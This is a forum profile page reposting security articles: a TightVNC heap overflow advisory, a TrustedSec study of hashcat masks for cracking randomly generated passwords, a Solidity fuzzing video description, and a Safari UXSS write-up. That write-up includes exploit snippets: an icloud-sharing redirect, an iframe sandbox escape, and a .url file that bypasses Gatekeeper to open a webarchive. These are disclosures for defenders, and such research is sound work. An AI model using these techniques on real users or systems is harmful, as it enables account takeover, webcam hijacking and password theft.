Everything posted by Nytro
-
CVE-2022-23967

In TightVNC 1.3.10, there is an integer signedness error and a resultant heap-based buffer overflow in InitialiseRFBConnection in rfbproto.c (in the vncviewer component). There is no check on the size given to malloc; e.g., -1 is accepted. This allocates a chunk of size zero, which will still return a heap pointer. However, one can then send 0xffffffff bytes of data, which can have a DoS impact or lead to remote code execution.

[Vulnerability Type] Buffer Overflow
[Vendor of Product] TightVNC
[Affected Product Code Base] vncviewer - 1.3.10
[Affected Component] File: rfbproto.c, function: InitialiseRFBConnection, line of code: 307
[Attack Type] Remote
[Impact Denial of Service] true
[Attack Vectors] You just need to set up a fake server to interact with the vulnerable client.
[Discoverer] Maher Azzouzi
[Reference] https://www.tightvnc.com/licensing-server-x11.php

Use CVE-2022-23967.

Sursa: https://github.com/MaherAzzouzi/CVE-2022-23967
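The core issue, a 32-bit length that passes a signed sanity check while denoting a huge unsigned size, can be reproduced outside of C. A minimal Python sketch of the pattern (illustrative only; this is not TightVNC's actual code):

```python
import struct

# A 4-byte length field arrives from the (malicious) server.
wire_bytes = b"\xff\xff\xff\xff"

# Read as a signed 32-bit integer, as in the vulnerable signedness check,
# the value is -1 and sails past a naive "too big?" comparison.
signed_len = struct.unpack(">i", wire_bytes)[0]
assert signed_len == -1 and signed_len < 1024

# The same bits as an unsigned size are ~4 GiB. Passed to malloc() after
# wrapping arithmetic, this can yield a tiny (even zero-size) chunk that
# the server then overflows with up to 0xffffffff bytes of data.
unsigned_len = struct.unpack(">I", wire_bytes)[0]
print(hex(unsigned_len))  # 0xffffffff
```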
-
RECOVERING RANDOMLY GENERATED PASSWORDS
January 25, 2022 By Hans Lakhan in Password Audits, Penetration Testing, Policy Development, Red Team Adversarial Attack Simulation, Security Program Management, Security Testing & Analysis

TL;DR – Use the following hashcat mask files when attempting to crack randomly generated passwords:
8 Character Passwords: masks_8.hcmask
9 Character Passwords: masks_9.hcmask
10 Character Passwords: masks_10.hcmask

When testing a client’s security posture, TrustedSec will sometimes conduct a password audit. This involves attempting to recover the plaintext passwords by extracting and cracking the NTLM hashes of accounts in a Windows domain. On average, TrustedSec is able to recover between 50-70% of these passwords because most users continue to choose ‘bad’ passwords, such as Winter2021!, December21!, etc.

As password managers like Thycotic Secret Server, LastPass, and HashiCorp Vault grow in popularity, the use of randomly generated passwords has increased. This poses a challenge for password recovery because, until now, the only feasible way to address it was to perform resource-intensive brute-force attacks. These attacks typically mean trying every single character in every single position of the password (a-z, A-Z, 0-9) and all the symbols on the keyboard. (We’re sticking to English characters here.) The result is 95 characters per position, and with an 8-character password, that means 95^8 possible combinations to test (6,634,204,312,890,625 to be exact), 630,249,409,724,609,375 for 9-character passwords, and 59,873,693,923,837,890,625 for 10-character passwords.

Even though TrustedSec has some powerful password crackers that can cover the entire 95^8 key space in less than a day, as soon as we bump it up to 9- or 10-character passwords, recovery becomes unfeasible. But… do we NEED to test every combination? There’s got to be a better way!
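The keyspace figures quoted above are straightforward to reproduce:

```python
# 95 printable ASCII characters per position; the keyspace is 95^length.
for length in (8, 9, 10):
    print(f"{length}-character passwords: {95 ** length:,} combinations")
```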
Hypothesis

Let’s presume you’ve encountered a set of hashes you knew were used in a Windows domain environment and were randomly generated to be 8 characters in length. Immediately, we know that to adhere to password complexity requirements, the password must include 3 of the 4 character classes—uppercase letters, lowercase letters, numbers, and/or symbols. This means, when considering our key space from above, that we don’t need to test for passwords made of all the same character, such as aaaaaaaa or 11111111. Furthermore, because of complexity requirements, you don’t need to test for passwords that use exclusively 2 character classes, like aaaa1111.

Taking this a step further, in casually observing randomly generated passwords, I noticed that I rarely see ones using a high quantity of a particular character class. To put it another way, I don’t think I’ve ever seen something like acbdef1! that has six consecutive lowercase letters. If this is true, could we improve our password cracking efforts by removing test cases that rarely or never happen?

Experimentation

To start, I used LastPass-cli to generate my data sets. I should note that I only used LastPass for my tests because it’s what I had available to me. It is by no means a bad product, and this blog post is not intended to highlight any security weakness in it. I generated three files containing 1 million passwords each, of 8, 9, and 10 characters in length. The commands to do this are as follows:

export LPASS_AGENT_TIMEOUT=0
for i in $(seq 1 1000000); do lpass generate --sync no _tmp 8 >> ~/1M_8.txt; done
for i in $(seq 1 1000000); do lpass generate --sync no _tmp 9 >> ~/1M_9.txt; done
for i in $(seq 1 1000000); do lpass generate --sync no _tmp 10 >> ~/1M_10.txt; done

Next, using a quick Python script, I enumerated all the character classes I found in each file, put them into a spreadsheet, and graphed them out. In reviewing these spreadsheets, there are a few things that immediately stood out.
First, regardless of the length of the randomly generated password, the vast majority had one to two digits. Additionally, regardless of the overall length of the generated passwords, none contained eight or more digits. In showing these results to my coworkers, a wise Logan Sampson asked a good question: ‘Are these results at all affected by the weight of some character class(es) over others?’ That is to say, of the 95 possible characters our random password generator could pick from, only 10 are digits. Therefore, it would make sense that digits are less common in randomly generated passwords.

Of the following key space:
0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ«space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
10.53% are digits
27.37% are lowercase letters
27.37% are uppercase letters
34.74% are symbols

To test this theory, I went back and tallied how frequently each individual character appeared across all the passwords. Here are the results: Logan was correct. The character distribution across all the passwords of all tested lengths is the same, which is great to see. An interesting side note… it appears that LastPass does not include the space character in its randomly generated passwords! This means our key space for characters to test can be reduced by one. Woo, efficiencies! Regardless, we can use the fact that some character classes are more likely to appear in a randomly generated password than others to our advantage. We could build a recovery method that uses statistically likely character classes. To build our attack, we’re going to use hashcat’s mask attack.
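These percentages also predict the digit counts observed in the graphs. Assuming each position is drawn uniformly from a 94-character alphabet (the 95 printable characters minus the space LastPass excludes), of which 10 are digits, the number of digits in an 8-character password follows a binomial distribution:

```python
from math import comb

N = 8              # password length
P_DIGIT = 10 / 94  # assumed alphabet: 94 characters, 10 of them digits

def pmf(k):
    """P(exactly k digits in an N-character random password)."""
    return comb(N, k) * P_DIGIT ** k * (1 - P_DIGIT) ** (N - k)

for k in range(N + 1):
    print(f"{k} digits: {pmf(k):6.2%}")

# Zero or one digit already accounts for roughly 79% of generated passwords,
# matching the "vast majority had one to two digits" observation.
```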
If you’re unfamiliar with hashcat masks, we can essentially instruct hashcat to test all possible characters of a given set by using the following table:

?l  abcdefghijklmnopqrstuvwxyz
?u  ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d  0123456789
?h  0123456789abcdef
?H  0123456789ABCDEF
?s  «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a  ?l?u?d?s
?b  0x00 – 0xff

For example, if we wanted to test all possible permutations of a password that was 4 characters in length and consisted of only lowercase letters, we’d use ?l?l?l?l. We can even specify custom character sets. For example, if I only wanted to test lowercase letters and digits, I would use -1 ?l?d to define a new character class, 1. Then I could specify ?1?1?1?1?1?1?1?1 to make a mask that tests all possible combinations of lowercase letters and digits for 8-character passwords.

Using the character class distributions, we’ll create the masks below. We’ll also replace hashcat’s standard ?s (which denotes all symbols) with our own custom class, to exclude the space character:

Special character class: -1 !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

8 Characters
Lower Alpha: 2 (?l?l)
Upper Alpha: 2 (?u?u)
Digit: 1 (?d) [1]
Symbol: 3 (?1?1?1)
[1] Technically, in our graphing, we see that zero digits is more frequent than one digit, but for this test I’m going to force a minimum of one digit.

9 Characters [2]
Lower Alpha: 2 (?l?l)
Upper Alpha: 3 (?u?u?u)
Digit: 1 (?d)
Symbol: 3 (?1?1?1)
[2] We could have easily swapped the values for Lower Alpha and Upper Alpha because their frequencies were relatively the same for 9-character passwords.

10 Characters
Lower Alpha: 3 (?l?l?l)
Upper Alpha: 3 (?u?u?u)
Digit: 1 (?d)
Symbol: 3 (?1?1?1)

Focusing on 8-character passwords, our mask now looks something like ?u?u?l?l?s?s?s?d. We should pay attention to the position of each character class to ensure that we test all possible combinations of these character class sets.
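Since a mask's coverage is just the product of its character-class sizes, it is easy to sanity-check how much keyspace a given mask covers. A small helper in Python (hypothetical; not part of hashcat itself):

```python
# Sizes of hashcat's built-in character classes.
CLASS_SIZES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "h": 16, "H": 16}

def mask_keyspace(mask, custom_sizes=None):
    """Number of candidate passwords a hashcat mask generates."""
    sizes = dict(CLASS_SIZES, **(custom_sizes or {}))
    total = 1
    for token in mask.split("?")[1:]:  # "?u?u?l?l" -> ["u", "u", "l", "l"]
        total *= sizes[token]
    return total

print(mask_keyspace("?l?l?l?l"))  # -> 456976
# Custom class ?1 holding 32 symbols (hashcat's ?s minus the space character):
print(mask_keyspace("?u?u?l?l?1?1?1?d", {"1": 32}))
```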
Meaning, using the above character class sets, we need to build a list of masks like:

?u?u?l?l?s?s?s?d
?u?u?l?l?s?s?d?s
?u?u?l?l?s?d?s?s
?u?u?l?l?d?s?s?s
?u?u?l?d?l?s?s?s
…

So, how many permutations will we need? To find out, you would normally take the total number of positions and compute the factorial (8x7x6x5x4x3x2x1). Because we are only interested in the unique patterns, we divide by the factorial of each character class count:

8! / (2! x 2! x 1! x 3!) = 40,320 / 24 = 1,680

The numerator is the factorial of the password length, and the denominator is the product of the factorials of the character class counts. In our case, 1,680 different hashcat masks are required for our 8-character-long password. Numbers numbers numbers, math math math…

Thankfully, hashcat supports submitting a file of masks, appropriately called an hcmask file. So, after generating a file of 1,680 masks, I tested my theory in several ways:

1. Tested the 1,680 masks against the initial set of 1M randomly generated 8-character passwords
2. Tested the 1,680 masks against a new set of 1M randomly generated 8-character passwords
3. Tested the 1,680 masks against ALL uncracked NTLM hashes in TrustedSec’s list of unrecovered hashes

Then I repeated the above for the 9- and 10-character masks and recorded the rate of cracked hashes over a period of 1 hour, 2 hours, and 3 hours. For a baseline, I also measured the total number of hashes recovered while using the standard brute-force methods. All tests were performed using 2x GeForce RTX 2080 Ti’s.
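The 1,680 orderings are just the unique permutations of the class multiset, so generating the mask file can be scripted. A sketch of how such an hcmask file could be built (hypothetical helper, not TrustedSec's actual tooling):

```python
from itertools import permutations

# Class multiset for 8-character passwords: two uppercase, two lowercase,
# one digit, and three symbols from the custom class ?1.
classes = ["?u", "?u", "?l", "?l", "?d", "?1", "?1", "?1"]

# set() collapses orderings that only swap identical classes:
# 8! / (2! * 2! * 1! * 3!) = 1,680 unique masks.
masks = sorted({"".join(p) for p in permutations(classes)})
print(len(masks))  # 1680

# One mask per line; a real .hcmask file would also prepend the ?1
# custom-charset definition to each line.
with open("masks_8.hcmask", "w") as fh:
    fh.write("\n".join(masks) + "\n")
```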
The results are as follows:

8 Characters, 1 hour (Standard Brute-Force / TrustedSec 1,680 hcmasks)
Initial 1M 8-character passwords: 28,825 (2.88%) / 29,314 (2.93%)
New set of 1M 8-character passwords: 24,638 (2.46%) / 29,126 (2.91%)
All uncracked NTLM hashes: 30 (0.003%) / 0 (0.00%)

8 Characters, 2 hours (Standard Brute-Force / TrustedSec 1,680 hcmasks)
Initial 1M 8-character passwords: 67,439 (6.74%) / 37,520 (3.75%) (77 minutes)
New set of 1M 8-character passwords: 68,299 (6.83%) / 37,391 (3.74%) (78 minutes)
All uncracked NTLM hashes: 50 (0.005%) / 0 (0.00%) (72 minutes)

8 Characters, 3 hours (Standard Brute-Force / TrustedSec 1,680 hcmasks)
Initial 1M 8-character passwords: 106,529 (10.65%) / 37,520 (3.75%) (77 minutes)
New set of 1M 8-character passwords: 107,498 (10.75%) / 37,391 (3.74%) (78 minutes)
All uncracked NTLM hashes: 62 (0.006%) / 0 (0.00%) (72 minutes)

9 Characters, 1 hour (Standard Brute-Force / TrustedSec 5,040 hcmasks)
Initial 1M 9-character passwords: 0 (0.00%) / 321 (0.03%)
New set of 1M 9-character passwords: 0 (0.00%) / 310 (0.03%)
All uncracked NTLM hashes: 0 (0.00%) / 2 (0.00%)

9 Characters, 2 hours (Standard Brute-Force / TrustedSec 5,040 hcmasks)
Initial 1M 9-character passwords: 0 (0.00%) / 630 (0.06%)
New set of 1M 9-character passwords: 0 (0.00%) / 630 (0.06%)
All uncracked NTLM hashes: 0 (0.00%) / 2 (0.00%)

9 Characters, 3 hours (Standard Brute-Force / TrustedSec 5,040 hcmasks)
Initial 1M 9-character passwords: 0 (0.00%) / 935 (0.09%)
New set of 1M 9-character passwords: 0 (0.00%) / 936 (0.09%)
All uncracked NTLM hashes: 0 (0.00%) / 4 (0.00%)

10 Characters, 1 hour (Standard Brute-Force / TrustedSec 16,800 hcmasks)
Initial 1M 10-character passwords: Overflow / 3 (0.00%)
New set of 1M 10-character passwords: Overflow / 3 (0.00%)
All uncracked NTLM hashes: Overflow / 0 (0.00%)

10 Characters, 2 hours (Standard Brute-Force / TrustedSec 16,800 hcmasks)
Initial 1M 10-character passwords: Overflow / 5 (0.00%)
New set of 1M 10-character passwords: Overflow / 8 (0.00%)
All uncracked NTLM hashes: Overflow / 0 (0.00%)

10 Characters, 3 hours (Standard Brute-Force / TrustedSec 16,800 hcmasks)
Initial 1M 10-character passwords: Overflow / 10 (0.00%)
New set of 1M 10-character passwords: Overflow / 14 (0.00%)
All uncracked NTLM hashes: Overflow / 0 (0.00%)

Conclusion

Did we find a better way to crack randomly generated passwords? Looking at the tables above, we can see that using these masks does get us more results in a shorter period of time when used against randomly generated passwords, but their effectiveness is not sustainable. This is because the brute-force approach covers the entire possible key space, whereas our masks only cover a subset. Put another way, these masks cover the more common random password character class layouts instead of attempting all possible character classes, and therefore using them can sometimes result in a quicker recovery of a randomly generated password.

Sursa: https://www.trustedsec.com/blog/recovering-randomly-generated-passwords/
-
Fuzzing Labs - Patrick Ventuzelo

📥 Download source code and materials: https://academy.fuzzinglabs.com/intro...

In this video, I will show how to find a vulnerability inside an Ethereum smart contract written in Solidity using echidna, one of the only Ethereum smart contract fuzzers.

#Fuzzing #Ethereum #Solidity

00:00 Introduction
01:00 Get started with echidna
01:50 Basic echidna test with testme.sol
03:00 Echidna invariants
05:45 Missing.sol smart contract target
07:25 Calling echidna on Missing.sol
08:40 Echidna detects the issue
09:05 Other interesting echidna examples
11:22 Going deeper

==== 💻 FuzzingLabs Training ====
- C/C++ Whitebox Fuzzing: https://academy.fuzzinglabs.com/c-whi...
- Rust Security Audit and Fuzzing: https://academy.fuzzinglabs.com/rust-...
- WebAssembly Reversing and Dynamic Analysis: https://academy.fuzzinglabs.com/wasm-...
- Go Security Audit and Fuzzing: https://academy.fuzzinglabs.com/go-se...

==== 🦄 Join the community ====
https://academy.fuzzinglabs.com/fuzzi...

==== 📡 Socials ====
- Twitter: https://twitter.com/FuzzingLabs
- Telegram: https://t.me/fuzzinglabs

Keywords: Fuzzing, Fuzz Testing, Ethereum, Solidity, ETH, smart contract

Link to this video: https://youtu.be/EA8_9x4D3Vk
-
Busra Demir

Hey all, this is a video tutorial on bypassing Data Execution Prevention (DEP) using Return Oriented Programming (ROP) chains. We'll go through the fully manual exploitation with lots of assembly tricks. I also brainstormed some ideas for the next videos, so feel free to drop a comment. Hope you enjoy the tutorial. Cheers!
-
Alert: Let's Encrypt to revoke about 2 million HTTPS certificates in two days Relatively small number of certs issued using a verification method that doesn't comply with policy Thomas Claburn in San Francisco Wed 26 Jan 2022 // 21:26 UTC Let's Encrypt, a non-profit organization that helps people obtain free SSL/TLS certificates for websites, plans to revoke a non-trivial number of its certs on Friday because they were improperly issued. In a post to the Let's Encrypt discussion community forum, site reliability engineer Jillian Tessa explained that on Tuesday, a third party reported "two irregularities" in the code implementing the "TLS Using ALPN" validation method (BRs 3.2.2.4.20, RFC 8737) in Boulder, its Automatic Certificate Management Environment (ACME) software. "All active certificates that were issued and validated with the TLS-ALPN-01 challenge before 0048 UTC on 26 January 2022 when our fix was deployed are considered mis-issued," explained Tessa. "In compliance with the Let's Encrypt CP [Certificate Policy], we have 5-days to revoke and will begin to revoke certificates at 1600 UTC on 28 January 2022." Let's Encrypt estimates that less than one per cent of active certificates are affected; this is still a large number – about two million, according to a spokesperson – given that there are currently about 221 million active Let's Encrypt-issued certificates. Affected certificate holders will be notified of the revocation by email, at which point certificate renewal will be necessary. This is not the remediation of an exploit. "The update to the TLS-ALPN-01 challenge type was made to be in compliance with the Baseline Requirements, which requires use of TLS 1.2 or higher," a spokesperson for Let's Encrypt told The Register in an email. 
When you get a certificate from Let's Encrypt, the organization's servers attempt to validate that you have control over the relevant resources by presenting a challenge, per the ACME standard. This challenge may be conducted using HTTP, DNS, or TLS, depending upon what works or doesn't work with the client setup. It's similar in concept to sending an email verification link that must be clicked to complete the setup of an online account. The TLS-ALPN-01 challenge is available for those unable or unwilling to use port 80 for an HTTP-01 challenge. According to Let's Encrypt, "It is best suited to authors of TLS-terminating reverse proxies that want to perform host-based validation like HTTP-01, but want to do it entirely at the TLS layer in order to separate concerns." Let's Encrypt developer Aaron Gable said in a separate post that two changes were made to the organization's verification code affecting client applications that specifically use TLS-ALPN-01. First, the software now enforces network negotiation using TLS 1.2 or higher. Previously the code allowed connections over TLS 1.1, which is now considered to be insecure. Second, the software no longer supports the legacy OID (Object Identifier) 1.3.6.1.5.5.7.1.30.1, which served to identify the "acmeIdentifier" extension in early versions of RFC 8737. The Let's Encrypt software now only accepts the standardized OID 1.3.6.1.5.5.7.1.31.
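The two fixes Gable describes correspond directly to TLS handshake parameters a validator sets. A rough client-side sketch of a TLS-ALPN-01-style probe in Python (illustrative only; Boulder itself is written in Go, and this is not its code):

```python
import ssl

# Context for connecting to a host answering the TLS-ALPN-01 challenge.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE  # the challenge certificate is self-signed by design

# Fix #1: refuse to negotiate anything below TLS 1.2.
ctx.minimum_version = ssl.TLSVersion.TLSv1_2

# RFC 8737: select the challenge responder via the "acme-tls/1" ALPN protocol.
ctx.set_alpn_protocols(["acme-tls/1"])

# Fix #2: when parsing the returned certificate, accept only the
# standardized acmeIdentifier extension OID; the legacy one is rejected.
ACME_IDENTIFIER_OID = "1.3.6.1.5.5.7.1.31"  # legacy 1.3.6.1.5.5.7.1.30.1 refused

print(ctx.minimum_version)
```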
Certificate verification attempts using TLS 1.1 or the discontinued OID will fail under the revised software; those certificates verified via TLS-ALPN-01 under the old code fail to comply with Let's Encrypt policy and thus need to be reissued. ® Sursa: https://www.theregister.com/2022/01/26/lets_encrypt_certificates/
-
Hacking the Apple Webcam (again)

Gaining unauthorized camera access via Safari UXSS: the story of how a shared iCloud document can hack every website you've ever visited.

Summary

It's been over a year since my last Apple camera hacking project, so I decided to give it another go. My hack successfully gained unauthorized camera access by exploiting a series of issues with iCloud Sharing and Safari 15. While this bug does require the victim to click "open" on a popup from my website, it results in more than just multimedia permission hijacking. This time, the bug gives the attacker full access to every website ever visited by the victim. That means in addition to turning on your camera, my bug can also hack your iCloud, PayPal, Facebook, Gmail, etc. accounts too. This research resulted in 4 0day bugs (CVE-2021-30861, CVE-2021-30975, and two without CVEs), 2 of which were used in the camera hack. I reported this chain to Apple and was awarded $100,500 as a bounty.

Background

Apple fixed my last 0day chain (CVE-2020-3852 + CVE-2020-3864 + CVE-2020-3865) by making camera access drastically more difficult. Now multimedia access is only allowed when the protocol is "https:" and the domain matches your saved settings. This means that cleverly malformed URIs won't cut it anymore. Now we need to genuinely inject our evil code into the target origin. In other words, we need to find a Universal Cross-Site Scripting (UXSS) bug. But what exactly is UXSS? Google Project Zero has a nice summary in their paper, "Analysis of UXSS exploits and mitigations in Chromium": "UXSS attacks exploit vulnerabilities in the browser itself [...] to achieve an XSS condition. As a result, the attacker does not just get access to user session on a single website, but may get access to any [website]." The authors of this paper go on to call UXSS "among the most significant threats for users of any browser" and "almost as valuable as a Remote Code Execution (RCE) exploit with the sandbox escape."
Sounds pretty great, right? Imagine building a website that can jump into https://zoom.com to turn on the camera, hop into https://paypal.com to transfer money, and hijack https://gmail.com to steal emails. Before we go any further, I should clarify how exactly this bug differs from my last Safari Camera Hacking project. That bug specifically targeted stored multimedia permissions. It did not give me the ability to execute code on arbitrary origins. Check out my attack diagram to see which origins were being used. In other words, that hack let me leverage Skype's camera permission but did not let me steal Skype's cookies.

Let's try to find a UXSS bug in the latest version of Safari (Safari v15 beta at time of writing). As always, the first step is to do a lot of research into prior work. After all, the best security research comes from standing on the shoulders of giants.

The Attack Plan

After reading numerous write-ups about patched Safari UXSS bugs, I decided to focus my research on webarchive files. These files are created by Safari as an alternative to HTML when a user saves a website locally.

Safari saving a website as a Webarchive file

A startling feature of these files is that they specify the web origin that the content should be rendered in.

Webarchive File Format

This is an awesome trick to let Safari rebuild the context of the saved website, but as the Metasploit authors pointed out back in 2013, if an attacker can somehow modify this file, they could effectively achieve UXSS by design. According to Metasploit, Apple did not view this attack scenario as very realistic because "the webarchives must be downloaded and manually opened by the client." Granted, this decision was made nearly a decade ago, when the browser security model wasn't nearly as mature as it is today. Apple's decision to support this ultra-powerful filetype gave way to an era of hackers trying to forcefully open them on victims' machines.
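The origin-in-the-file property is easiest to see by building one. A webarchive is a binary property list; the sketch below uses Python's plistlib and the commonly reverse-engineered WebMainResource key names (Apple publishes no official spec, so treat the key names as assumptions):

```python
import plistlib

# HTML that will execute in whatever origin the archive claims.
payload = b"<script>alert(document.domain)</script>"

archive = {
    "WebMainResource": {
        "WebResourceData": payload,
        "WebResourceURL": "https://example.com/",  # origin the content renders in
        "WebResourceMIMEType": "text/html",
        "WebResourceTextEncodingName": "UTF-8",
        "WebResourceFrameName": "",
    }
}

blob = plistlib.dumps(archive, fmt=plistlib.FMT_BINARY)

# Round-trip to show the attacker-chosen origin travels inside the file.
decoded = plistlib.loads(blob)
print(decoded["WebMainResource"]["WebResourceURL"])
```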
Fundamentally, this attack can be broken into two steps:
1) Forcefully download an evil webarchive file
2) Forcefully open it

Until recently, there were no protections to prevent step #1. Prior to Safari 13, no warnings were even displayed to the user before a website downloaded arbitrary files. So planting the webarchive file was easy. (Now with Safari 13+, users are prompted before each download.) Opening the webarchive file was trickier, but still manageable by somehow navigating to the file:// URI scheme. Back when Safari's error pages lived on the file:// scheme, hackers figured out how to purposely invoke an error page and just alter its pathname, a hack delightfully dubbed "Errorjacking." See here and here for two variations. Another approach that worked back in the day was to simply set the <base> tag to file://.

Fast forward to 2022, and things get a lot harder. Not only are auto-downloads prevented by default, but webarchive files are considered malicious applications by macOS Gatekeeper. This means that users can't even manually open foreign webarchives themselves anymore. Apple seems to have changed their 2013 stance about how dangerous these files can be.

Download prompt in Safari 13+

Gatekeeper Launch Prevention

Still, webarchive files just seem too juicy to give up on. Let's explore how this old-school hack can still occur on the latest Safari and macOS builds.

Exploration of custom URI Schemes

I found success with my last Safari Camera Hacking project by conducting a deep dive into official IANA-registered URI schemes. This project was heavily guided by RFCs and public documentation. But there is an entire world of custom URL schemes that I neglected to talk about. These unofficial and (mostly) undocumented schemes are usually used by third-party iOS/macOS apps as a form of deep linking. There is actually an entire community built around discovering and using these schemes cross-app for both fun and hacking projects.
An interesting note: several first-party system apps, such as Apple Help Viewer (help://), FaceTime (facetime-audio://), and Apple Feedback (applefeedback://), also support custom URI schemes. Abusing these schemes from a website in Safari is not a novel technique. Indeed, hackers have been finding ways to use custom schemes to launch (and exploit bugs in) system applications for a while now. Hacks range from annoyingly placing calls, to aiding in social engineering, to arbitrary file execution. Seriously, there is some awesome research in this space. To help combat these attacks, modern versions of Safari warn the user before blindly launching secondary applications. That is, unless they are one of the hardcoded exceptions identified in this great Blackhat presentation.

Custom URI Schemes that Safari will launch without Prompt

All of these schemes are registered with Launch Services, so you can list them (and others) via this command:

/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -B6 bindings:.*: | grep -B6 apple-internal

After digging through internal Apple schemes and cross-referencing them with the ones trusted by Safari, I found one that caught my eye: "icloud-sharing:". This scheme appears to be registered by an iCloud Sharing application called "ShareBear."

LaunchServices data about the icloud-sharing: scheme

ShareBear was interesting to me because sharing iCloud documents seemed like a plausible path towards downloading & launching webarchive files. I couldn't find any publicly available documentation or research about this scheme, so I just started poking at it myself.

ShareBear Application

At this point we have identified an application that can be automatically launched by Safari; however, we do not know how to correctly open it yet. Luckily, it was pretty straightforward. Some quick research shows that iCloud File Sharing can generate a public Share Link.
Creating a public iCloud Share Link

These Share Links look something like this: https://www.icloud.com/iclouddrive/01fooriERbarZSTfikqmwQAem

Simply replacing "https" with "icloud-sharing" is all that's needed to have Safari automatically open ShareBear with this file as a parameter.

<script>
location.href = 'icloud-sharing://www.icloud.com/iclouddrive/01fooriERbarZSTfikqmwQAem'
</script>
evil.html

Great, so what does ShareBear do now? Some quick testing showed this behavior:

ShareBear Behavior Flowchart

There is a subtle, but wildly impactful, design flaw in this behavior. Let's dig into what happens if the user has not opened this file before. The user will be shown a prompt, similar to the one below.

ShareBear Open Prompt

This innocuous little prompt, with the default value of "Open," seems pretty straightforward. A user should expect to have the image, example.png, opened if they agree. But in actuality, they are agreeing to much more than that. Once the user clicks Open, the file is downloaded onto the victim's machine at the location /Users/<user>/Library/Mobile Documents/com~apple~CloudDocs, then automatically opened via Launch Services. Then the user will never see this prompt again. From that point forward, ShareBear (and thus any website in Safari) will have the ability to automatically launch this file. The truly problematic part of this agreement is that the file can be changed by anybody with write access to it. For example, the owner of the file could change the entire byte content and file extension after you agree to open it. ShareBear will then download and update the file on the victim's machine without any user interaction or notification. In essence, the victim has given the attacker permission to plant a polymorphic file onto their machine and the permission to remotely launch it at any moment. Yikes. Agreed to view my PNG file yesterday? Well, today it's an executable binary that will be automatically launched whenever I want.
Apple fixed this behavior in macOS Monterey 12.0.1 as a result of my report, without issuing a CVE, because it is more of a design flaw than a bug per se.

Bonus Bug: Iframe Sandbox Escape

While fuzzing the icloud-sharing:// scheme, I stumbled upon a fun bug unrelated to the UXSS hunt. ShareBear appears to check the path of the URL for "/iclouddrive/*" before performing the behavior outlined above. If the path happens to be "/photos/*", then ShareBear makes a pretty silly mistake. It will tell Safari to open a new tab pointing to the iCloud web app... but it does not verify that the domain name is actually the iCloud web app. In normal operation, the user is simply presented with the website "https://photos.icloud.com." However, because this domain name is never validated, we can trick ShareBear into instructing Safari to open a new tab to any website.

The implications of this behavior may not be obvious. This doesn't seem all that different than just calling window.open('https://example.com') normally. However, there are situations on the web where websites aren't allowed to do that. One example is if a popup blocker is enabled. Another, more devious, example is when your website is inside of a sandboxed iframe. The sandbox iframe attribute is typically used when you want to embed untrusted 3rd-party content on your website. For example, you may want to display an ad banner on your blog, but you don't want this ad to be able to run JavaScript (who knows, maybe the ad author has a browser 0day). An important rule for sandboxed iframes is that new windows opened from that iframe should inherit the same restrictions as the iframe itself. Otherwise, escaping the sandbox would be as trivial as opening a popup. Well, this bug tricks Safari into opening a 'fresh' new tab without any sandbox restrictions!
<html>
<head>
<meta http-equiv="refresh" content="0;URL='icloud-sharing://example.com/photos/foo'" />
</head>
</html>
Website trapped in a Sandboxed Iframe

So ShareBear neglecting to verify the domain gives us an easy popup-blocker bypass and an iframe sandbox escape. Nice! (Fixed in Safari 15.2 without being assigned a CVE.) Live demo on BugPoC - https://bugpoc.com/poc#bp-S4HH6YcO PoC ID: bp-S4HH6YcO, Password: loVEDsquId01. Note this demo will only work with Safari <15.2 pre macOS Monterey 12.1. Now back to the Camera/UXSS hunt.

Quarantine and Gatekeeper

Quick reminder of where we are - our website can prompt the user to open a shared PNG file. If the user agrees, we can automatically launch this file at any point in the future, even after we alter the file content and extension. The attacker can then modify the file on his own machine and ShareBear will take care of updating it on the victim's machine.

Mutating the Polymorphic File (attacker's machine vs. victim's machine)

The attacker's website can then automatically launch this newly-updated file using the same icloud-sharing:// URL that he used to display the original prompt. This seems very close to our goal of forcefully downloading & opening an evil webarchive file. We can just swap out the content of puppy.png for a webarchive file and rename it "evil.webarchive", right? Unfortunately for us, pesky macOS Gatekeeper won't allow that.

Gatekeeper Launch Prevention

It appears that ShareBear correctly gives downloaded files the 'com.apple.quarantine' attribute, and according to Apple, "Gatekeeper prevents quarantined executable files and other similar files (shell scripts, web archives, and so on) from opening or executing." For a deep dive into how macOS treats this attribute, as well as how Gatekeeper performs code signing, check out this great write-up.
For our purposes, there are two big limitations introduced by this OS protection -
1) We can't run our own apps
2) We can't directly open webarchive files

Side Bar - while we can't run our own apps, launching existing, approved apps is trivial. Just use a fileloc to point to a local app (this technique is quite common). This attack is sometimes referred to as "Arbitrary File Execution" and is often misunderstood because it looks so scary.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>URL</key>
    <string>file:///System/Applications/Calculator.app</string>
</dict>
</plist>

fileloc pointing to macOS Calculator

Using the icloud-sharing:// scheme to launch the fileloc

While this attack might look scary, launching an already-approved app doesn't have much impact. Let's focus on opening webarchives.

Shortcuts

The above technique to open local apps is reminiscent of an old-school symlink attack. It basically just uses a "shortcut" to trick software into opening something it doesn't expect. Lots of different operating systems and applications have reinvented the wheel over the years when it comes to shortcuts. Nowadays, the term "shortcut" could be referring to a Unix symlink, a macOS alias, a Windows link file, a Safari webloc, an Edge bookmark, etc.

I was hopeful that I could use this technique to bypass Gatekeeper and open a webarchive file. This idea seemed promising to me because the actual application I want to open is Safari (an existing, approved application). Gatekeeper doesn't have a problem with me launching Safari; it just gets upset when I attempt to open any file ending in ".webarchive". So I needed to find a shortcut filetype that launches Safari, then tells Safari to open a different file. After some trial and error, I found just that - the ancient Windows URL file!
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,2
[InternetShortcut]
URL=file:///path/to/webarchive
IDList=

evil.url file pointing to a local webarchive

Launching evil.url successfully opens Safari and instructs it to load the webarchive file without asking Gatekeeper for permission! (CVE-2021-30861)

